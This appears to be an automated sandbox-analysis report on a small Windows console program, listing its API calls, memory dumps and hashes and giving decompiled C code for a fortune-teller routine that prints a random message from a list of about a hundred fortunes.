                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,013E8C85,?,013DF681,?,000000BC,?,00000001,00000000,00000000), ref: 013E8687
                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,013E8C85,?,013DF681,?,000000BC,?,00000001,00000000,00000000), ref: 013E86B0
                                                                          • GetACP.KERNEL32(?,?,013E8C85,?,013DF681,?,000000BC,?,00000001,00000000), ref: 013E86C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID: ACP$OCP
                                                                          • API String ID: 2299586839-711371036
                                                                          • Opcode ID: 60bb24ace94eb002c6dc4a5212216fe19ed23b13868b5344f6075e4d80044a9c
                                                                          • Instruction ID: 028d78418bc58169a64a85db55cf5f6fca37c3dd47de05f92355428710bdb43c
                                                                          • Opcode Fuzzy Hash: 60bb24ace94eb002c6dc4a5212216fe19ed23b13868b5344f6075e4d80044a9c
                                                                          • Instruction Fuzzy Hash: A4018835A01716BEEB319B59EC0DB9E7BEDAF0036CF204098E301E51C0EB60DB418B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DD3A1, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 013E6807
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013E681C
                                                                          • UnhandledExceptionFilter.KERNEL32(013F0DCC), ref: 013E6827
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 013E6843
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 013E684A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2579439406-0
                                                                          • Opcode ID: 9d1746b020e033e80b1848bd5c8de7eda25e79005384d9d58921476b4428973d
                                                                          • Instruction ID: 13e50e93def8381bc80dfcd636ddefa042062ff50d8991c1c1ac1d98e6165e6a
                                                                          • Opcode Fuzzy Hash: 9d1746b020e033e80b1848bd5c8de7eda25e79005384d9d58921476b4428973d
                                                                          • Instruction Fuzzy Hash: 0621BCB98113099FD730EFA8F18DA483BFCBB69315F10506EE50987688E7B49988CF05
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E605C, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001601A), ref: 013E6061
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 8f42d5266837247d3f2545b0dc9d84f8c3586312806d6d5cbb2770774d49e665
                                                                          • Instruction ID: c65b30376b605157ff0d818624e6d0ee7be1137b600b808ed443715d53557cd5
                                                                          • Opcode Fuzzy Hash: 8f42d5266837247d3f2545b0dc9d84f8c3586312806d6d5cbb2770774d49e665
                                                                          • Instruction Fuzzy Hash: 919002A025532446DA202B71E90F60529E85A6AA0AF414464E001C8188DA9084016622
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E9D51, Relevance: .4, Instructions: 355COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction ID: 7d783115d12d094136a7c0549bd54e685396d11e4cebd9c3a65e37f3969c55a6
                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction Fuzzy Hash: ADC15C73D0A6F249DB36462E085C33BEEE26E81A4D31F8795DDD03F1CA8622AD1597D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E9969, Relevance: .3, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction ID: 38dd84cc8e19390da6b7611c008f15864d99ba4eab4c853c559bcf8b4b0e643a
                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction Fuzzy Hash: 7CC15F73D0A6B649DB36462D485C33AEEE26E81A4D31B8395DDD03F1CAC222AD1597D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E9597, Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction ID: 441c6270fb0f0d5260b2e70a72470f3fce985e25a9509cded86a858a3aebf7dc
                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction Fuzzy Hash: 42C16F73D4A6F249DB36462D085C33AEEE27E81A5C31B8395DDD03F2CAC222AD0597D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E91F9, Relevance: .3, Instructions: 326COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                          • Instruction ID: 829fb71333ae972a7662978579b932e6b79c98b3fe996332380b696e3c649f3f
                                                                          • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                          • Instruction Fuzzy Hash: 95B14073D0A6B645DB36852D485C33BEEE26E81A4D31BC3A5DDE03F1CAC226AD0597D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FD014, Relevance: .0, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
                                                                          • Instruction ID: 45d9c2f6f876ca485d2003edf756d1ab94e2b7636463c25ea23e4d244348994e
                                                                          • Opcode Fuzzy Hash: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
                                                                          • Instruction Fuzzy Hash: 05E01235264549EFC744CBACCC85D55B3E8EB19664B154298FA15C73A0D634ED00DA50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FD051, Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                                          • Instruction ID: 880349f6f21e5ee8a2d6eebbe137a250f266dc528ddfffe39feb11348ed92041
                                                                          • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                                          • Instruction Fuzzy Hash: A9E04F372105159BC7619A9DC908D92F7E8EF886F4B054429EB4997620C231FC01D6E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FD0B4, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013FC520, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                          • Instruction ID: f82ea9333bf6b1f2c12c50497c0bd6a0c038b32f814f3a7cba24b192b33067b7
                                                                          • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                          • Instruction Fuzzy Hash: D5B012706924D48EEB13C338C419F5276F0A740F05FC9A4E4F009C2C82C35CCA84D100
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D11C0, Relevance: 183.9, APIs: 7, Strings: 98, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E013D11C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				char* _v172;
				intOrPtr _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				char* _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				char* _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				char* _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				char* _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				char* _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char* _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				char* _v368;
				char* _v372;
				char* _v376;
				char* _v380;
				char* _v384;
				char* _v388;
				char* _v392;
				void* __ebp;
				char* _t105;
				signed int _t111;
				signed int _t120;
				void* _t124;

				_t127 = __eflags;
				_t123 = __esi;
				_t122 = __edi;
				_t119 = __edx;
				_t116 = __ebx;
				_t105 = "FLATTERY WILL GO FAR TONIGHT.";
				_v392 = "YOUR TALENTS WIL BE RECOGNIZED AND SUITABLY REWARDED.";
				_v388 = "YOU ARE GOING TO HAVE SOME NEW CLOTHES.";
				_v384 = "DO NOT MISTAKE TEMPTATION FOR OPPORTUNITY.";
				_v380 = "THE WORLD MAY BE YOUR OYSTER, BUT IT DOESN\'T MEAN YOU\'LL GET ITS PEARL.";
				_v376 = _t105;
				_v372 = "THE GREATEST DANGER COULD BE YOUR STUPIDITY.";
				_v368 = "A SECRET ADMIRER WILL SOON SEND YOU A SIGN OF AFFECTION.";
				_v364 = "WE CANNOT DO GREAT THINGS; ONLY SMALL THINGS WITH GREAT LOVE. -- MOTHER TERESA.";
				_v360 = "YOU WERE BORN WITH THE SKILL TO COMMUNICATE WITH PEOPLE EASILY.";
				_v356 = "NONE OF THE SECRETS OF SUCCESS WILL WORK UNLESS YOU DO.";
				_v352 = "YOU ARE VERY EXPRESSIVE AND POSITIVE IN WORDS, ACT AND FEELING.";
				_v348 = "TRUST YOUR INTUITION. THE UNIVERSE IS GUIDING YOUR LIFE.";
				_v344 = "IF YOU WANT THE RAINBOW, YOU MUST TO PUT UP WITH THE RAIN. -- D. PARTON";
				_v340 = "A BUG IN THE HAND IS BETTER THAN ONE AS YET UNDETECTED.";
				_v336 = "A COMPLEX SYSTEM THAT WORKS IS INVARIABLY FOUND TO HAVE EVOLVED FROM A SIMPLE SYSTEM THAT WORKS.";
				_v332 = "A BLACK CAT CROSSING YOUR PATH SIGNIFIES THAT THE ANIMAL IS GOING SOMEWHERE.";
				_v328 = "AND NOW THE TIME FOR SOMETHING COMPLETELY DIFFERENT.THE HARD TIMES WILL BEGIN TO FADE, JOY WILL TAKE THEIR PLACE.";
				_v324 = "LIES TODAY.";
				_v320 = "SMALL ONES CAN BE JUST AS EFFECTIVE.";
				_v316 = "DON\'T YOU WISH YOU HAD MORE ENERGY... OR LESS AMBITION?";
				_v312 = "FINE DAY FOR FRIENDS.";
				_v308 = "O-SO DAY FOR YOU.";
				_v304 = "IT IS SO VERY HARD TO BE AN ON-YOUR-OWN-TAKE-CARE-OF-YOURSELF-BECAUSE-THERE-IS-NO-ONE-ELSE-TO-DO-IT-FOR-YOU GROWNUP.";
				_v300 = "ITS A VERY *__UN*LUCKY WEEK IN WHICH TO BE TOOK DEAD.";
				_v296 = "IT\'S ALL IN YOUR HEAD.";
				_v292 = "GET A LIFE!";
				_v288 = "MANY CHANGES OF MIND AND MOOD; DO NOT HESITATE TOO LONG.";
				_v284 = "STAY AWAY FROM CARS TODAY.";
				_v280 = "ALL YOUR HARD WORK WILL SOON PAY OFF.";
				_v276 = "YOU\'LL DIE IN A LOTTLE MORE THAN A MONTH.";
				_v272 = "A GOOD TIME TO FINISH UP OLD TASKS.";
				_v268 = "YOU DONT REALLY BELIEVE IN FORTUNES.";
				_v264 = "STAY AWAKE TILL LATE TODAY.";
				_v260 = "YOU\'LL BE SURPRISED.";
				_v256 = "LET YOUR FOOT LOOSE TODAY!";
				_v252 = "YOUR CRUSH WILL MEET TO YOU TODAY.";
				_v248 = "YOU NEED SOME FUN IN LIFE.";
				_v244 = "WHAT HAPPENED LAST NIGHT CAN HAPPEN AGAIN.";
				_v240 = "A FRIEND ASKS ONLY FOR YOUR TIME, NOT YOUR MONEY.";
				_v236 = "NEVER TROUBLE TROUBLE UNTIL TROUBLE TROUBLES YOU.";
				_v232 = "MISUNDERSTANDING WILL BREAK YOUR FRIENDSHIP SOON.";
				_v228 = "YOU HAVE TAKEN YOURSELF TOO SERIOUSLY.";
				_v224 = "YOU\'RE STUPID.";
				_v220 = "YOU HAVE THE CAPACITY TO LEARN FROM MISTAKES.";
				_v216 = "YOU\'LL LEARN A LOT TODAY.YOU HAVE UNUSUAL EQUIPMENT FOR SUCCESS, USE IT PROPERLY.";
				_v212 = "YOU WILL RECEIVE A FORTUNE COOKIE.";
				_v208 = "SOMEONE WILL INVITE YOU TO A KARAOKE PARTY.";
				_v204 = "HELP! IM STUCK INSIDE THE FORTUNE TELLER!";
				_v200 = "THERE IS NO MISTAKE SO GREAT AS THAT OF BEING ALWAYS RIGHT.";
				_v196 = "SOMEONE THINKS YOU ARE WONDERFULLY MYSTERIOUS";
				_v192 = "A TUB AND A RUB WILL CHANGE YOUR DAY.";
				_v188 = "EAT YOUR VEGETABLE AND YOU WILL BE STRONG LIKE POPEYE.";
				_v184 = "A CLOSED MOUTH GATHERS NO FEET.";
				_v180 = "YOU WILL MAKE A GREAT LAWYER.";
				_v176 = 0x13f2f98;
				_v172 = "A ROLLING STONE GATHERS NO MOSS.";
				_v168 = "YOU CAN ALWAYS FIND HAPPINESS AT WORK ON FRIDAY.";
				_v164 = "A FANATIC IS ONE WHO CAN\'T CHANGE HIS MIND, AND WON\'T CHANGE THE SUBJECT.";
				_v160 = "HE WHO LAUGHS AT HIMSELF NEVER RUNS OUT OF THINGS TO LAUGH AT.";
				_v156 = _t105;
				_v152 = "HE WHO FARTS IN CHURCH, SITS IN HIS OWN PEW!";
				_v148 = "YOU WILL RECEIVE A FORTUNE.";
				_v144 = "SING AND REJOICE, FORTUNE IS SMILING ON YOU.";
				_v140 = "YOU HAVE THE RARE ABILITY TO RECOGNIZE ABILITY IN OTHERS.";
				_v136 = "LIFE TO YOU IS A DASHING AND BOLD ADVENTURE.";
				_v132 = "THE TIME IS RIGHT TO MAKE NEW FRIENDS.";
				_v128 = "YOU WILL MAKE A SUDDEN RISE IN LIFE.";
				_v124 = "SOMEONE FROM YOUR PAST HAS RETURNED TO STEAL YOUR HEART.";
				_v120 = "YOU DISPLAY THE WONDERFUL TRAITS OF CHARM AND COURTESY.";
				_v116 = "HAPPINESS ALWAYS ACCOMPANIES WITH YOU.";
				_v112 = "YOUR HEART IS PURE, AND YOUR MIND CLEAR, AND SOUL DEVOUT.";
				_v108 = "WHEN WINTER COMES HEAVEN WILL RAIN SUCCESS ON YOU.";
				_v104 = "YOU WILL HAVE A FINE CAPACITY FOR THE ENJOYMENT OF LIFE.";
				_v100 = "YOU WILL ENJOY GOOD HEALTH.";
				_v96 = "ACCEPT THE NEXT PROPOSITION YOU HEAR.";
				_v92 = "YOU SHOULD BE ABLE TO UNDERTAKE AND COMPLETE ANYTHING.";
				_v88 = "IN GOD (SIC) WE TRUST; ALL OTHERS MUST PAY CASH.";
				_v84 = "THESE THREE GO TOGETHER:\nYOU WILL BE CALLED UPON TO HELP A FRIEND IN TROUBLE.\nDON\'T LET FRIENDS IMPOSE ON YOU, WORK CALMLY AND SILENTLY.\nYOUR ROAD WILL BE MADE SMOOTH FOR YOU BY GOOD FRIENDS.";
				_v80 = "YOU WILL ALWAYS BE SUCCESSFUL IN YOUR PROFESSIONAL CAREER.";
				_v76 = "THERE IS NO WISDOM GREATER THAN KINDNESS.";
				_v72 = "YOU LEAD A USEFUL LIFE NO MATTER WHAT RICHES ARE COMING TO YOU.";
				_v68 = "YOUR MIND IS CREATIVE, ORIGINAL AND ALERT.";
				_v64 = "YOU COULD PROSPER IN THE FIELD OF MEDICAL RESEARCH.";
				_v60 = "YOU ARE A HAPPY MAN.";
				_v56 = "YOUR PRESENT PLANS ARE GOING TO SUCCEED.";
				_v52 = "A PLEASANT SURPRISE IS WAITING FOR YOU.";
				_v48 = "THESE TWO GO TOGETHER:\nYOU HAVE MUCH SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE.\nYOU HAVE GREAT SKILL IN EXPRESSING YOURSELF TO BE EFFECTIVE.";
				_v44 = "YOUR HOME IS A PLEASANT PLACE FROM WHICH YOU DRAW HAPPINESS.";
				_v40 = "A VISIT TO A MUSEUM WILL BRING YOU A NEW SENSE OF APPRECIATION.";
				_v36 = "YOUR GOOD DEEDS ARE NEVER FORGOTTEN.";
				_v32 = "IT\'S TIME YOU ASKED THAT SPECIAL SOMEONE OUT ON A DATE.";
				_v28 = "THE WORLD IS ALWAYS READY TO RECIEVE TALENT WITH OPEN ARMS.";
				_v24 = "WISH YOU A LONG LIFE.";
				_v20 = "YOU WILL HAVE A LONG AND HEALTHY LIFE.";
				_v16 = "HAPPINESS IS FOUND WHEN ONE IS NOT LOOKING.";
				_v12 = "SOMEONE HAS COMPLEMENTED YOU TODAY IN YOUR ABSENCE.";
				_v8 = "YOU WILL BECOME BETTER ACQUAINTED WITH A COWORKER.";
				E013DBDEC(E013DC26F(__ecx, __edx, __eflags, 0));
				_push("------------------------------------------------------------------");
				 *0x13fe250 = 0xa0005;
				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
				_push("------------------------------------------------------------------");
				 *0x13fe250 = 0x120005;
				E013DB9F5(__ebx, _t119, __edi, __esi, _t127);
				_push("YOUR FORTUNE FOR TODAY:");
				 *0x13fe250 = 0xc000a;
				E013DB9F5(_t116, _t119, _t122, _t123, _t127);
				 *0x13fe250 = 0xe000a;
				_t111 = E013DBDFE(_t127);
				asm("cdq");
				_t99 = _t111 % 0x64;
				_t128 = _t99;
				_t120 = _t99;
				_t121 =  *((intOrPtr*)(_t124 + _t120 * 4 - 0x184));
				_push( *((intOrPtr*)(_t124 + _t120 * 4 - 0x184)));
				_push("%s");
				E013DB9F5(_t116,  *((intOrPtr*)(_t124 + _t120 * 4 - 0x184)), _t122, _t123, _t99);
				_push("Enter any key to continue...");
				 *0x13fe250 = 0x170032;
				E013DB9F5(_t116, _t121, _t122, _t123, _t99);
				return E013EDBFD(_t116, _t122, _t123, _t128);
			}









































































































                                                                          0x013d11c0
                                                                          0x013d11c0
                                                                          0x013d11c0
                                                                          0x013d11c0
                                                                          0x013d11c0
                                                                          0x013d11c9
                                                                          0x013d11ce
                                                                          0x013d11d8
                                                                          0x013d11e2
                                                                          0x013d11ec
                                                                          0x013d11f6
                                                                          0x013d11fc
                                                                          0x013d1206
                                                                          0x013d1210
                                                                          0x013d121a
                                                                          0x013d1224
                                                                          0x013d122e
                                                                          0x013d1238
                                                                          0x013d1242
                                                                          0x013d124c
                                                                          0x013d1256
                                                                          0x013d1260
                                                                          0x013d126a
                                                                          0x013d1274
                                                                          0x013d127e
                                                                          0x013d1288
                                                                          0x013d1292
                                                                          0x013d129c
                                                                          0x013d12a6
                                                                          0x013d12b0
                                                                          0x013d12ba
                                                                          0x013d12c4
                                                                          0x013d12ce
                                                                          0x013d12d8
                                                                          0x013d12e2
                                                                          0x013d12ec
                                                                          0x013d12f6
                                                                          0x013d1300
                                                                          0x013d130a
                                                                          0x013d1314
                                                                          0x013d131e
                                                                          0x013d1328
                                                                          0x013d1332
                                                                          0x013d133c
                                                                          0x013d1346
                                                                          0x013d1350
                                                                          0x013d135a
                                                                          0x013d1364
                                                                          0x013d136e
                                                                          0x013d1378
                                                                          0x013d1382
                                                                          0x013d138c
                                                                          0x013d1396
                                                                          0x013d13a0
                                                                          0x013d13aa
                                                                          0x013d13b4
                                                                          0x013d13be
                                                                          0x013d13c8
                                                                          0x013d13d2
                                                                          0x013d13dc
                                                                          0x013d13e6
                                                                          0x013d13f0
                                                                          0x013d13fa
                                                                          0x013d1404
                                                                          0x013d140e
                                                                          0x013d1418
                                                                          0x013d141e
                                                                          0x013d1428
                                                                          0x013d1432
                                                                          0x013d143c
                                                                          0x013d1446
                                                                          0x013d1450
                                                                          0x013d1457
                                                                          0x013d145e
                                                                          0x013d1465
                                                                          0x013d146c
                                                                          0x013d1473
                                                                          0x013d147a
                                                                          0x013d1481
                                                                          0x013d1488
                                                                          0x013d148f
                                                                          0x013d1496
                                                                          0x013d149d
                                                                          0x013d14a4
                                                                          0x013d14ab
                                                                          0x013d14b2
                                                                          0x013d14bb
                                                                          0x013d14c2
                                                                          0x013d14c9
                                                                          0x013d14d0
                                                                          0x013d14d7
                                                                          0x013d14de
                                                                          0x013d14e5
                                                                          0x013d14ec
                                                                          0x013d14f3
                                                                          0x013d14fa
                                                                          0x013d1501
                                                                          0x013d1508
